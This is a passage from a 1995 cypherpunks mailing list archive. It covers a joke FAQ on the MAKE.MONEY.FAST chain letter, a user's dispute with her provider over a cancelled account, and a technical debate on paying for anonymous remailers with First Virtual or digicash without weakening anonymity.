If you are trying to *post* the chain letter, please read the following: By now you should know that the net doesn't find all the waste of networking resources, time and money this stupid and illegal scam has caused amusing at all. I have actually been forced to incorporate an automatic chain letter detector / bouncer just for this... Here is the appropriate FAQ: - - - - - - - - - - - - - - - - - - - This FAQ is for the benefit of those who have never experienced the advertisement MAKE.MONEY.FAST. Here are some answers to some questions frequently asked. 1. Does MAKE.MONEY.FAST really work? Not in the sense that you'll make money fast, but you'll make a lot of enemies fast. 2. If I forward or repost MAKE.MONEY.FAST, will I get a lot of mail? Yes, hate mail, flames, etc. 3. How can I get my account cancelled? Post MAKE.MONEY.FAST. 4. How can I get my system administrator mad at me? Post MAKE.MONEY.FAST. His mailbox will be so full of complaints, it'll take him/her a week to sort through all of them. 5. Who is Dave Rhodes? Salmon Rushdie's roommate. Just about every administrator wants to kill him so he had to go in hiding. 6. How can I assure I have a long and prosperous life? Well, nobody can guarantee that, but it can be guaranteed that if you post MAKE.MONEY.FAST you're life may be cut short by accident (hee hee). 7. Just how does one have to never work again after posting MAKE.MONEY.FAST? Well, MAKE.MONEY.FAST is a Ponzi scheme. Ponzi schemes are illegal. Ponzi schemes are a form of fraud. Some of these net interchanges go over telephone wires, optic fibers, and microwave transmissions all regulated by the FCC. If you repost MAKE.MONEY.FAST over the net, and someone at the FCC wanted to get nasty, they may want to prosecute you for WIRE fraud. Once you're in jail, you never have to pay rent, your meals are free. Anal injections are free. MAKE.MONEY.FAST has a lot of side benefits. 8. How can I help to stop the spread of MAKE.MONEY.FAST? 
When some netter newbie blunders and posts MAKE.MONEY.FAST on the net, just send him a polite letter to not do it again (remember, the newbies act out of ignorance) then write the root at domain and request they inform all their users not to perpetuate this drivel. - - - - - - - - - - - - - - - - - - - Contents of message follows: X-Envelope-To: na166182 Received: by anon.penet.fi (5.67/1.35) id AA19254; Fri, 6 Jan 95 18:50:45 +0200 Received: from relay2.uu.net(192.48.96.7) by anon.penet.fi via anonsmtp (V1.3mjr) id sma017754; Fri Jan 6 18:47:54 1995 Received: from toad.com by relay2.UU.NET with SMTP id QQxxnn06516; Fri, 6 Jan 1995 11:50:16 -0500 Received: by toad.com id AA06017; Fri, 6 Jan 95 08:43:15 PST Received: from vortex.mm.com ([204.73.34.1]) by toad.com id AA05996; Fri, 6 Jan 95 08:42:58 PST Received: from downburst.mm.com (carolann at downburst.mm.com [204.73.34.2]) by vortex.mm.com (8.6.9/8.6.6) with ESMTP id KAA28027; Fri, 6 Jan 1995 10:48:27 -0600 Received: (carolann at localhost) by downburst.mm.com (8.6.9/8.6.6) id KAA13250; Fri, 6 Jan 1995 10:48:16 -0600 Date: Fri, 6 Jan 1995 10:48:16 -0600 (CST) From: Carol Anne Braddock Subject: Re: Chain letter bounced (fwd) To: "L. McCarthy" Cc: cypherpunks at toad.com In-Reply-To: <199501061011.FAA23248 at bb.hks.net> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-cypherpunks at toad.com Precedence: bulk Thanks for the great article....I chuckled a lot, and I haven't had a lot to chuckle about these days..... But I still think that as the computer program we trust the most, he deserves overt support in all phases of of my life. Even though I am dead broke, I could tell my main newsgroups. I wasn't asking or telling. Just informing. And it was to .1% of all Usenet ....That...is...not...a...lot! I am sure the real point of your post will come through, but for now I'm kinda clueless. Love always, Carol Anne On Fri, 6 Jan 1995, L. McCarthy wrote: > [...] 
> > To: cypherpunks at toad.com > > From: "L. McCarthy" > [...] > > Posting letters asking for $$$ is of course a risky venture on Usenet. We > > see the PRZ Appeal as a Worthy Cause (tm), but that's just what all the > > MAKE.MONEY.FAST posters think of their garbage too. If you go sticking out > [...] > > -L. Futplex McCarthy >From carolann at vortex.mm.com Fri Jan 6 01:39:29 1995 Date: Thu, 5 Jan 1995 21:57:05 -0600 From: Carol Anne Braddock To: carolann at vortex.mm.com [icicle.winternet.com] Login name: carolann In real life: CarolAnne Braddock Directory: /usr2/carolann Shell: /etc/scripts/tcsh-susp Last login Thu Jan 5 21:38 on ttyq5 from annex3-1.wintern New mail received Thu Jan 5 21:16:23 1995; unread since Mon Jan 2 13:18:25 1995 Plan: This account has been disabled permanently. Mike Horwath - Admin - Winternet - drechsau at winternet.com From anonymous-remailer at shell.portal.com Fri Jan 6 10:40:21 1995 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Fri, 6 Jan 95 10:40:21 PST Subject: SysAdmin of the year Message-ID: <199501061846.NAA26994@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- > > According to Carol Anne Braddock: > His name is Michael Horwath, root at winternet.com ^^^^^^^^^^^^^^^ > [icicle.winternet.com] > Login name: carolann In real life: CarolAnne Braddock > Directory: /usr2/carolann Shell: /etc/scripts/tcsh-susp > Last login Thu Jan 5 21:38 on ttyq5 from annex3-1.wintern > New mail received Thu Jan 5 21:16:23 1995; > unread since Mon Jan 2 13:18:25 1995 > Plan: > This account has been disabled permanently. - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] 
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLw2PxioZzwIn1bdtAQEgggF+ImxhTJlTtuMMJglmt3z/EriU0W2KisJZ
kr+JZeyf2iPyi5O/xsoHNWR/jHaYtE34
=wNlp
-----END PGP SIGNATURE-----

From carolann at mm.com Fri Jan 6 10:57:46 1995
From: carolann at mm.com (Carol Anne Braddock)
Date: Fri, 6 Jan 95 10:57:46 PST
Subject: your mail
In-Reply-To: <20014f17.39f3-niallm@avernus.internet-eireann.ie>
Message-ID:

Is that better...giggle... Hope you make and hand out some hard copies!

Love Always, Carol Anne

ps if it was you instead of Zimmy the result would have been the same, I think. I'll rant why I'm actually on the list soon

From carolann at mm.com Fri Jan 6 11:03:12 1995
From: carolann at mm.com (Carol Anne Braddock)
Date: Fri, 6 Jan 95 11:03:12 PST
Subject: There.....Do ya like this one better?
Message-ID:

Signature withdrawn at the request (pretty rightfully so) of my dear friends on the Cypherpunk List.

Coming Soon: The Internet Debut of CENSORED.COM

From jrochkin at cs.oberlin.edu Fri Jan 6 11:16:09 1995
From: jrochkin at cs.oberlin.edu (Jonathan Rochkind)
Date: Fri, 6 Jan 95 11:16:09 PST
Subject: Remailer Abuse
Message-ID:

At 7:28 AM 01/06/95, Nathaniel Borenstein wrote:
>Again, this comes down to definitions of anonymity. In this case, if
>you start from the silly assumption that the anonymous remailer actually
>keeps records that correlate messages to payment mechanisms, Doug is
>right, but barely. To break the anonymity, you'd need collusion between
>the operator of the anonymous remailer AND First Virtual, because the
>former knows which account sent a message, and the latter knows who that
>account belongs to. (And before you tell me that this sounds a lot like

While this might be secure enough for some people, it is important to note that it definitely is less secure than the current free remailer net.
Currently, if I send my message through 10 remailers, many more than just two of the operators need to cooperate in order to get my true identity. I think that at least 8 or 9 of them do, actually. In a First Virtual payment-scheme remailernet, no matter how many remailers I send my message through, any _one_ operator, together with First Virtual, can burst my anon bubble.

I suppose this still might be enough security for some people. After all, penet is enough security for some people. But I'd guess that most people using cypherpunks remailers instead of Julf's penet remailer aren't going to be willing to settle for it, because it doesn't give you very much more security than penet. My trust of Julf, who has an amazingly good reputation on the net and furthermore isn't in the U.S. (and presumably isn't subject to U.S. government coercion), certainly isn't any less than my trust of First Virtual. And if I'm still sending through 10 remailers, which I'd be doing for traffic analysis reasons, any _one_ of them, together with FV, can compromise me. Weakest link in the chain. Which means my risk _rises_ with increased remailer chain length. If I was willing to accept that level of risk, I'd just use penet which is much more convenient.

The First Virtual method does seem possible for Julf's remailer, since users pretty much already trust Julf completely, so the Julf+FV system isn't any less secure than the just Julf system. But it's just not anonymous enough for cypherpunks-style remailers.

From adam at bwh.harvard.edu Fri Jan 6 11:19:04 1995
From: adam at bwh.harvard.edu (Adam Shostack)
Date: Fri, 6 Jan 95 11:19:04 PST
Subject: Remailer Abuse
In-Reply-To:
Message-ID: <199501061911.OAA08861@bwnmr5.bwh.harvard.edu>

nsb wrote:
| Excerpts from mail: 5-Jan-95 Re: Remailer Abuse db at Tadpole.COM (1180*)
| > Heh. An anonymous remailer paid for by credit card...
there'd
| > have to be an additional level of indirection for it to work,
| Again, this comes down to definitions of anonymity. In this case, if
[...]
| two different countries. For my part, I figure that if the government
| of Finland and the government of the US can actually agree that it's so
| important to force the sacrifice of anonymity in a given case that
| they're both willing to coerce companies under their jurisdiction, they
| will probably have a very good reason for doing so. Maybe I'm too
| trusting, though.)

It's also a matter of analysing your threats. There may be employees of one or more companies involved who might sell information. Then again, if you're selling plans of the B2 to the Iraqis, the US & Norwegian governments might collude to track you down, (and in the process, read a lot of other messages.)

| Excerpts from mail: 5-Jan-95 Re: Remailer Abuse wcs at anchor.ho.att.com (2028)
| > Beyond that, though, are some traffic analysis problems -
| > remailers require a fair bit of traffic to be useful, and unless
| > you receive a reasonable amount of encrypted traffic,
| > and support encrypted email for purchasing remailer service
| > and other merchandise, an eavesdropper would have a fairly good source
| > of traffic data on your remailer users, especially since buying and using
| > remailer service requires two messages within an hour or so.
| Well, I think low-volume remailers are always a bit vulnerable to
| traffic analysis attacks, aren't they? One thing you could do is
| build a variable time-delay into the remailer, to make it harder to
| correlate messages coming in with those going out. To take paranoia a
| step further, you could allow people to encrypt their mail TO an
| anonymous remailer with the remailer's public key, and let the remailer
| send it out unencrypted.

Time delay does not guarantee mixing, which is the intent of time delay schemes. Might as well mix directly, since that's what you're trying to accomplish.
Someone (I think it was Hal) wrote up a message describing the math involved. And I don't think encrypting the various parts of a remailer chain is very paranoid; I don't particularly trust the remail ops not to read my mail. Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From carolann at mm.com Fri Jan 6 11:24:21 1995 From: carolann at mm.com (Carol Anne Braddock) Date: Fri, 6 Jan 95 11:24:21 PST Subject: SysAdmin of the year In-Reply-To: <199501061846.NAA26994@bb.hks.net> Message-ID: Aren't ya glad 94's over with? He was in a big hole as 95 started. His machine was being hacked routinely. Nobody on the Web visited the site. I just like PGP. I believe it to be the nicest program anywhere. It has lots of everyday uses, even you used it. And when I crosspost a help note to .1% of Usenet, and lose 4 days of good postings, everyone loses. Till of course the story is told, for all to know. Love Always, Carol Anne Signature withdrawn at the request (pretty rightfully so) of my dear friends on the Cypherpunk List Coming Soon: The Internet Debut of CENSORED.COM On Fri, 6 Jan 1995 anonymous-remailer at shell.portal.com wrote: > -----BEGIN PGP SIGNED MESSAGE----- > > > > > According to Carol Anne Braddock: > > > His name is Michael Horwath, root at winternet.com > ^^^^^^^^^^^^^^^ > > > [icicle.winternet.com] > > Login name: carolann In real life: CarolAnne Braddock > > Directory: /usr2/carolann Shell: /etc/scripts/tcsh-susp > > Last login Thu Jan 5 21:38 on ttyq5 from annex3-1.wintern > > New mail received Thu Jan 5 21:16:23 1995; > > unread since Mon Jan 2 13:18:25 1995 > > Plan: > > This account has been disabled permanently. > > > - --- > [This message has been signed by an auto-signing service. A valid signature > means only that it has been received at the address corresponding to the > signature and forwarded.] 
> > -----BEGIN PGP SIGNATURE----- > Version: 2.6.2 > Comment: Gratis auto-signing service > > iQBFAwUBLw2PxioZzwIn1bdtAQEgggF+ImxhTJlTtuMMJglmt3z/EriU0W2KisJZ > kr+JZeyf2iPyi5O/xsoHNWR/jHaYtE34 > =wNlp > -----END PGP SIGNATURE----- > From dwomack at runner.utsa.edu Fri Jan 6 11:35:16 1995 From: dwomack at runner.utsa.edu (Dave) Date: Fri, 6 Jan 95 11:35:16 PST Subject: Carol Anne - C'Punk Poster Person? Message-ID: <9501061935.AA14193@runner.utsa.edu> It occurs to me that Carol's problem may well be of considerable interest to c'punks and free speechers everywhere. Not that I favor spam or it's derivatives - but Cancelmoose and others define spam as *_50_* or more groups, esp. without crossposting. My basis for saying that Carol's situation is of interest is ---- as the net becomes more vulnerable to regulation, who among is immune to a quick cancellation of account? For something such as, say, the irresponsible (and antisocial?) advocacy of crypto? If an account can be chopped for 10 posts, where is the bottom limit? 5 perhaps? 2 maybe? 1 post that the sys-admin disagrees with? Developing the idea, and combining it with for-profit remailers...what would be wrong with a provider offering a unix shell based account, with the option of registering the account under a nym - and with finger user switchable from on to off and back again? The login ID would also be unconnected to the name. Frankly, none of this seems that radical...our friend, America On Line has some of these characteristics! Various 'anti-true spam' strategies could be used to prevent massive postings of Make Money Etc...But instead of a remailer, an actual *_system_* would be used. Payments could be by electronic invoice and money orders... Any thoughts on this? Dave From carolann at mm.com Fri Jan 6 11:43:17 1995 From: carolann at mm.com (Carol Anne Braddock) Date: Fri, 6 Jan 95 11:43:17 PST Subject: Files and mail In-Reply-To: Message-ID: Dear Mr. Horwath, A written reply will suffice. 
You have my permission to make all of my files world readable. You can put them in the ftp site. Upon receipt of notice, they will be removed within 24 hours, and you will recieve a signed PGP statement with the new key, stating that the files have been removed. Other Winternet users have already gone to my defense, and copied all of the world readable material anyway. And the whole account might as well be, too. Please do not forward any mail here. You will better serve yourself bouncing the letter back to the sender and informing them of my new address. If I find forwarded mail in my mailbox, I will print hard copies and visit the Attorney General's Office and file a complaint under the Stalking laws of the State of Minnesota. And please...deactivate my WWW pages. I was astounded to find out that during the suspension, they continued to remain active, as I learned in the office Wednesday. That was (and still is) stealing my net.web.goodwill, and creating a falsehood amongst other users. My WWW Pages have found a nice, new, warm sunny home in Austin, Texas. I spent six full hours making a personal appearance, at great personal expense, to the Winternet Office to resolve the situation. My original reply still sits in suspended composition in my mailer. I wasted not a nano-second in preparing my reply to the posting. In legal point of fact, the poster is violation of Minnesota State Law. He has no legal jurisdiction whatsoever. I did not take days to "investigate", nor cite that other things such as "my machines being hacked" and "I'll do it when I'm ready to do it,". I was a simple complaint. It had no validity. Crossposting an article to .1% of the Usenet News Groups does not by the very statistic constitute spam. (And I own two shares of Hormel Corp, so I do know what SPAM (tm) is. As was pointed out in alt.current-affairs.net-abuse The complainer didn't fully read said article. It was timely.(and still is) The crossposting wasn't wasting resources. 
It is of no one's concern the actual groups posted. They have the right and ability to respond. I asked for no money. I did not stand to profit by the posting. The person who started the whole thing was pretty heavily chastised, by the readers of his own news group. A fast "K" was all that any individual needed for this article. No, Mr. Horwath, you are "way out-of-bounds" this time. And as the time cronology unveils itself, I am sure that will be shown to be a very truthful, factual statement. Dangerous precedents were set here. I will not rest until the whole of the Internet knows and is aware of the situation. Signed Carol Anne Braddock Friday January 6th, 1995 9:40 A.M. On Fri, 6 Jan 1995, Mike Horwath wrote: > You are welcome to your files and mail, I will pack everything up for > you as you left it, including your FTP area. > > I expect you to try to reach me today in the afternoon at my office and > I will fully explain why your account was deleted, with full detail as > to why. > > I do appreciate the work you did on the shirts for Winternet. I don't > appreciate the harassment you have already tried to bring upon me. > > When we talk, I think you might understand why this was done. If you do > not, then I feel bad, as I must then not be making myself clear. But > no matter what, this was policy that you chose to break even after I > had talked to you about it. More on this when we talk. > > Good luck at your new provider, Larry Leone is an old user of mine and > seems to be a good guy, even if a little quiet on the newsgroups :) > > A copy of this letter is also going to your new admin so that he knows > what is going on. > > Larry, Carol Anne was using about 11.5MB of disk that will be moving > over from Winternet to MM. > > Also, how have you been anyway? Been awhile since I saw you. Oh, and > could you install identd on your system? Get back to me on anything, > or with questions. 
> > -- > Mike Horwath IRC: Drechsau LIFE: Lover drechsau at winternet.com > Winternet: info at winternet.com root at jacobs.mn.org <- Linux! > Twin Cities area Internet Access: 612-941-9177 for more info > Founding member of Minnesota Coalition for Internet Accessibility > From flatline at u.washington.edu Fri Jan 6 11:55:22 1995 From: flatline at u.washington.edu (Christopher E Stefan) Date: Fri, 6 Jan 95 11:55:22 PST Subject: True Names In-Reply-To: Message-ID: On Thu, 5 Jan 1995, Angus Patterson wrote: > I've been trying to get True Names by Vernor Vinge, and have been told it's > out of print (like most good cypunk ), does anybody have it scanned? > I realize this is without permission, so does anybody have Vinge's address? > (e-mail or otherwise) or could anybody ask him? Btw, does he have any other > crypto/anonymity related stories? Thanks in advance. I saw a copy of _True Names_ in a local bookstore recently, so if you check around you may be able to find it. You may also want to check the used bookstores in your area. Good luck! -- Christopher E Stefan * flatline at u.washington.edu * PGP 2.6ui key by request From nelson at crynwr.com Fri Jan 6 12:08:18 1995 From: nelson at crynwr.com (Russell Nelson) Date: Fri, 6 Jan 95 12:08:18 PST Subject: Remailer Abuse In-Reply-To: Message-ID: Date: Fri, 6 Jan 1995 14:19:07 -0500 From: jrochkin at cs.oberlin.edu (Jonathan Rochkind) In a First Virtual payment-scheme remailernet, no matter how many remailers I send my message through, any _one_ operator, together with First Virtual, can burst my anon bubble. Why? Why wouldn't the FV remailers use settlements? At the end of the month, everyone settles accounts in re who gets what fraction of what. No logs are needed other than counters. -- -russ http://www.crynwr.com/crynwr/nelson.html Crynwr Software | Crynwr Software sells packet driver support | ask4 PGP key 11 Grant St. | +1 315 268 1925 (9201 FAX) | What is thee doing about it? 
Potsdam, NY 13676 | What part of "Congress shall make no law" eludes Congress? From zoo at armadillo.com Fri Jan 6 12:38:39 1995 From: zoo at armadillo.com (david d `zoo' zuhn) Date: Fri, 6 Jan 95 12:38:39 PST Subject: Carol Anne - C'Punk Poster Person? Message-ID: <199501062040.OAA06369@monad.armadillo.com> I don't think there's much of a case for 'poster child' status involved. Users on the Winternet systems (of which I happen to be one) sign an Agreement stating that they'll abide by Netiquette whenever using internet services. Failure to do so can result in termination of service. This is Mike's way to limit the amount of time he has to spend dealing with users who generate flamage. There was [apparently] another issue involving reselling of service that I don't have details on, but which is likely to be related. Where's the censorship? I don't see it. CarolAnne is free to make whatever statements she likes (since she has service from another provider). The New York Times doesn't have to allow me to put an article on page one (much as I might wish to do so). That's not censorship either. No one is obligated to provide a soap box for someone to stand on. This is a free market issue, not free speech. Since there is competition in the local area, people are free to choose whichever provider they like. Some have more explicit AUP's than others. Some probably haven't even considered the issue. There's no one crying "Foul! Begone from the net forever". THAT would be censorship. But this is a case of "You're not following my rules. Be gone from my machine." I've got my own setup at home, mostly independent of network provider and becoming moreso as time progresses, to prevent J. Random Sysadmin from cutting me off arbitrarily. It costs more money this way, but that's not entirely unreasonable. 
I'd rather see a market of half a dozen or more providers in any given area, each mostly independent, providing a number of choices as to service levels and policy expectations, instead of a monolithic Micro$oft (or AOL or CI$ or Delphi or etc) "We ARE the Internet" where censorship (in the traditional definition of someone vetting any public [or private!] postings) is much more common. I could see a market for service where someone who decided to armorplate their machine could provide service to those who persist in doing "net.stupid.things". Provide anonymous accounts on that machine, and remailer accounts, and such, and then stand back and ignore all of the flamage that will come the way of root|postmaster|usenet|whatever. [ Personally, I'd likely put that domain into my global killfiles, but that's selective reading, not censorship. ] [ More disclaimers -- I don't represent Winternet in any way, nor Mike Horwath nor CarolAnne Braddock. I have no connection with Winternet except as a customer. I speak solely for myself and Armadillo Zoo Enterprises. And I'm not afraid of an electronic stalking prosecution. ] -- - david d `zoo' zuhn -| armadillo zoo software -- St. Paul, Minnesota -- zoo at armadillo.com --| unix generalist (and occasional specialist) ------------------------+ http://www.armadillo.com/ for more information pgp key upon request +---------------------------------------------------- From jrochkin at cs.oberlin.edu Fri Jan 6 12:39:26 1995 From: jrochkin at cs.oberlin.edu (Jonathan Rochkind) Date: Fri, 6 Jan 95 12:39:26 PST Subject: Remailer Abuse Message-ID: At 3:12 PM 01/06/95, Russell Nelson wrote: > Date: Fri, 6 Jan 1995 14:19:07 -0500 > From: jrochkin at cs.oberlin.edu (Jonathan Rochkind) > > In a First Virtual payment-scheme remailernet, no matter how many remailers > I send my message through, any _one_ operator, together with First Virtual, > can burst my anon bubble. > >Why? Why wouldn't the FV remailers use settlements? 
At the end of >the month, everyone settles accounts in re who gets what fraction of >what. No logs are needed other than counters. Oh, you're suggesting that I'd only actually pay the first remailer on my chain, and at the end of the month he'd pay some of the money I (and others) paid him to all of the other remailers he transacted with over the month? I hadn't thought of that, but now that I do, I can see several problems arising. 1) The initial remailer has no way of knowing how many subsequent links there are in the chain, and so doesn't know if I've paid him enough to reimburse everyone else. I can easily cheat. He also doesn't know _who_ the subsequent chains are. He can deduct one "stamp" from the amount, and forward the rest on to the next remailer, and trust them to do the same, but if I'm cheating there won't be enough to make it to the end of the chain. Both of these facts (initial op doesn't know how long the chain will be, or who will be on it) are essential to the security I get from using anon remailers, so even if they could be "fixed", it would be bad to. 2) This system requires a good deal of cooperation and organization among remailer operators. They've got to agree to send each other the proper amount of money, they've got to set up policies for what the proper amount of money is, they've got to stay in relatively constant contact to keep everything running smoothly. In effect, a remailers trade association is created, and if I want to use any of the remailers in that group, I've got to use _only_ remailers in that group in my chain. I'd rather use a chain of remailers which aren't associated that closely, hopefully don't even know each other, and possibly some of which only exist for a short period of time (guerilla remailers, a risk if I'm paying, in that I can't necessarily trust them not to steal my money, but if the money I'm paying is something like $.05 to each remailer, not a real serious risk).
Assuming that there will be some free as well as some charging remailers, I'd also like to use some of each in my chain. I see some problems with the Remailer Trade Association allowing those transactions to happen. (will they accept incoming mail from a non-affiliated remailer, which surely won't be paying them at the end of the month? Surely not, which means if I use any affiliated remailers in my chain, no affiliated remailers can come afterwards. So all affiliated remailers I'm using have to come before all non-affiliated remailers, which is an undesirable restriction which could aid traffic analysis. If there are several affiliations, things get even more complicated.) There are probably other problems too, that I haven't thought of yet. An FV-style system doesn't seem to do the trick. And it isn't an issue of certain sacrifices you have to make in order to set up for-pay remailers, as a Chaum digicash based for-pay remailer system would work admirably, and none of my objections would apply to it. From nsb at nsb.fv.com Fri Jan 6 13:15:51 1995 From: nsb at nsb.fv.com (Nathaniel Borenstein) Date: Fri, 6 Jan 95 13:15:51 PST Subject: Remailer Abuse In-Reply-To: <28351.789422888.1@nsb.fv.com> Message-ID: Excerpts from mail: 6-Jan-95 Re: Remailer Abuse nelson at crynwr.com (779) > From: jrochkin at cs.oberlin.edu (Jonathan Rochkind) > In a First Virtual payment-scheme remailernet, no matter how many remailers > I send my message through, any _one_ operator, together with First Virtual, > can burst my anon bubble. > Why? Why wouldn't the FV remailers use settlements? At the end of > the month, everyone settles accounts in re who gets what fraction of > what. No logs are needed other than counters. I hate to say it, because I generally tend to take the pro-FV side of most arguments :-), but I think Jonathan's closer to the mark in this case.
If mail goes through ten remailers, and they ALL charge via First Virtual, then the last one in the chain won't have to know who you are, but it will have to know your FV billing account. Thus it, together with FV, have enough information to break anonymity. This is NOT the same as saying that ANY one operator, together with FV, can burst anonymity; it means that the last one + FV can do so. I think, however, that you'd need to break into the last one to get enough information to allow the next-to-last one to figure out the right FV-id. (This assumes that you're tracing the message from its ultimate destination, not monitoring traffic as it passes through the remailers -- in the latter case, Jonathan is probably right on the mark.) Personally, for my taste this is sufficiently anonymous for any reasonable purpose. HOWEVER, I can imagine how to make it even more anonymous. Imagine that there are ten for-profit anonymous remailer operators who form an "anonymous remailers consortium". Each of them operates TWO remailers, a for-pay one and a free one, but the free one will only take things that have come directly via some consortium member's anonymous remailer, so your message has to be paid for once, at the entry point to the overall system. Now you can build up a chain that STARTS with a payment, but then threads its way through a bunch of less traceable systems, where the operators can't give tracing information even under court order. The consortium members would probably have to agree to some revenue sharing arrangements, but you could make this work. I think this level of engineering is overkill -- for my personal level of paranoia, I would settle for a single for-pay anonymous remailer located in a country with very different laws than those that governed the payment system.
Such a system would probably be "breakable" for the legal pursuit of genuine terrorists, but not for government harassment of political dissidents, closet gays from conservative countries, pornographers, etc. I guess my basic assumption is that while any given government can not be trusted with too much power, if you can't distribute your trust for such things across several very different governments, human freedom may be a lost cause in the long run anyway. -- Nathaniel From nsb at nsb.fv.com Fri Jan 6 13:21:06 1995 From: nsb at nsb.fv.com (Nathaniel Borenstein) Date: Fri, 6 Jan 95 13:21:06 PST Subject: Remailer Abuse In-Reply-To: <1185.789426406.1@nsb.fv.com> Message-ID: <4j3PEYr0Eyt5IxI7VW@nsb.fv.com> Excerpts from mail: 6-Jan-95 Re: Remailer Abuse jrochkin at cs.oberlin.edu (3378*) > 1) The initial remailer has no way of knowing how many subsequent links > there are in the chain, and so doesn't know if I've paid him enough to > reimburse everyone else. I can easily cheat. This depends entirely on your definition of "cheating". Basically, my proposal (which I think crossed in the mail with yours, so I'm not claiming that you misunderstood it -- in fact you anticipated *most* of it, I think) was to charge once for entry to the "system", and to include in that charge as many "hops" as you feel are necessary. No cheating involved -- the truly anonymous hops would only be accessible from within the "system", i.e. from a similar anonymous remailer "inside" the system or from one of the fee-for-entry systems. If this is the charging model, then the objections about knowing the chain length, etc. all go away. > 2) This system requires a good deal of cooperation and organization among > remailer operators. Not that much, just a revenue sharing arrangement based on income and volume. Consortia do this sort of thing all the time, though most consortia aren't formed in quite the atmosphere of paranoia that often surrounds remailers.....
> Assuming that there will be some free as well as some charging remailers, > I'd also like to use some of each in my chain. I see some problems with > the Remailer Trade Association allowing those transactions to happen. > (will they accept incoming mail from a non-affiliated remailer, which surely > won't be paying them at the end of the month? Surely not, which means if I > use any affiliated remailers in my chain, no affiliated remailers can come > afterwards. So all affiliated remailers I'm using have to come before all > non-affiliated remailers, which is an undesirable restriction which could > aid traffic analysis. If there are several affiliations, things get even > more complicated.) Actually, I think this could be serialized -- you could design it so that you could use free remailers either before or after the consortium members, but once you left the consortium system your message would have to somehow pay to get back in again. That would be a mess, and not my preferred way to do it. > And it isn't an issue of > certain sacrifices you have to make in order to set up for-pay remailers, > as a Chaum digicash based for-pay remailer system would work admirably, and > none of my objections would apply to it. Yes, it is true that if digicash starts working for real money, it will answer your objections quite nicely. However, there are lots of objections to that sort of system, too, they're just different ones. As both the FV and Digicash folks have pointed out many times, we have very different technologies that fill very different requirements, it's not an either/or choice. I think you could build interesting anonymous remailers on each system, too.
-- Nathaniel From jrochkin at cs.oberlin.edu Fri Jan 6 13:30:13 1995 From: jrochkin at cs.oberlin.edu (Jonathan Rochkind) Date: Fri, 6 Jan 95 13:30:13 PST Subject: for-pay remailers and FV (Was Re: Remailer Abuse) Message-ID: At 4:10 PM 01/06/95, Nathaniel Borenstein wrote: >I hate to say it, because I generally tend to take the pro-FV side of >most arguments :-), but I think Jonathan's closer to the mark in this >case. If mail goes through ten remailers, and they ALL charge via First >Virtual, then the last one in the chain won't have to know who you are, >but it will have to know your FV billing account. Thus it, together >with FV, have enough information to break anonymity. > >This is NOT the same as saying that ANY one operator, together with FV, >can burst anonymity; it means that the last one + FV can do so. I Hmm. Maybe I don't completely understand how this is going to work, but won't _every_ remailer in the chain need to know your FV billing account? How would the rest of them charge via FV without knowing your billing account? What Russell was suggesting (I think), was that only the first would bill via FV directly, so only the first would need to know your billing account, and then he'd settle up with the others at the end of the month. (A particular variation of that scheme is what you mentioned later in your message, and I'll get to that). But assuming that every remailer along the chain _was_ charging via FV, I fail to see how only the last one would need your billing account; seems to me they all would, and thus any one could collude with FV to violate your anonymity. [...] >Personally, for my taste this is sufficiently anonymous for any >reasonable purpose. HOWEVER, I can imagine how to make it even more >anonymous. Imagine that there are ten for-profit anonymous remailer >operators who form an "anonymous remailers consortium".
Each of them >operates TWO remailers, a for-pay one and a free one, but the free one >will only take things that have come directly via some consortium >member's anonymous remailer, so your message has to be paid for once, at >the entry point to the overall system. Now you can build up a chain >that STARTS with a payment, but then threads its way through a bunch of >less traceable systems, where the operators can't give tracing >information even under court order. The consortium members would >probably have to agree to some revenue sharing arrangements, but you >could make this work. Yeah, that's a specific instance of the type of thing Russell was proposing in the message you were replying to. An instance which avoids many of the criticisms I made directly after Russell's message, but not all. The remailer operators still have to have an organization and remain in close contact, which I am uncomfortable with because it seems to make collusion more likely. And it's still difficult to intermix for-pay and free remailers within your chain, or even just for-pay remailers from several different consortiums. And there are a variety of problems in that inability. [The consortium, as far as I can tell, would also find it rather difficult to charge more for a longer chain, I can't think of any way for them to charge anything except a uniform amount regardless of length of chain, unless you give the first remailer a way to tell the length of your chain, which is undesirable. I'm not sure if this is a problem.] >I think this level of engineering is overkill -- for my personal level >of paranoia, I would settle for a single for-pay anonymous remailer >located in a country with very different laws than those that governed >the payment system. Such a system would probably be "breakable" for And this level of paranoia would be perfectly well served by a Julf/penet style remailer, which _would_ work well with an FV-payment system, as I agreed before.
The cypherpunks chained remailernet system as a whole is overkill for your paranoia needs, but apparently not for the needs of those who use it over Julf's. It appears to me, that an FV-style payment scheme can't be added to the cypherpunks chained remailer system without dropping its security to the level of Julf's. Which might be good enough for you, but not good enough for me, or presumably for anyone else that uses cypherpunks remailers. [Do you understand how cypherpunks remailers work, and the difference between them and a julf/penet style remailer? Do you understand how encryption is used in a cypherpunks-style remailer chain to make it so each individual remailer only knows the next remailer along the chain, and not the entire rest of the chain?] From carolann at mm.com Fri Jan 6 13:35:58 1995 From: carolann at mm.com (Carol Anne Braddock) Date: Fri, 6 Jan 95 13:35:58 PST Subject: Remailer Abuse In-Reply-To: Message-ID: Yes Russell, you hit the nail on the head. It's all about trust. On Fri, 6 Jan 1995, Russell Nelson wrote: > what. No logs are needed other than counters. > > -- > -russ http://www.crynwr.com/crynwr/nelson.html > Crynwr Software | Crynwr Software sells packet driver support | ask4 PGP key > 11 Grant St. | +1 315 268 1925 (9201 FAX) | What is thee doing about it? > Potsdam, NY 13676 | What part of "Congress shall make no law" eludes Congress? > Signature withdrawn at the request (pretty rightfully so) of my dear friends on the Cypherpunk List Coming Soon: The Internet Debut of CENSORED.COM From jrochkin at cs.oberlin.edu Fri Jan 6 13:44:48 1995 From: jrochkin at cs.oberlin.edu (Jonathan Rochkind) Date: Fri, 6 Jan 95 13:44:48 PST Subject: Remailer Abuse Message-ID: At 4:20 PM 01/06/95, Nathaniel Borenstein wrote: >Yes, it is true that if digicash starts working for real money, it >will answer your objections quite nicely. However, there are lots of >objections to that sort of system, too, they're just different ones.
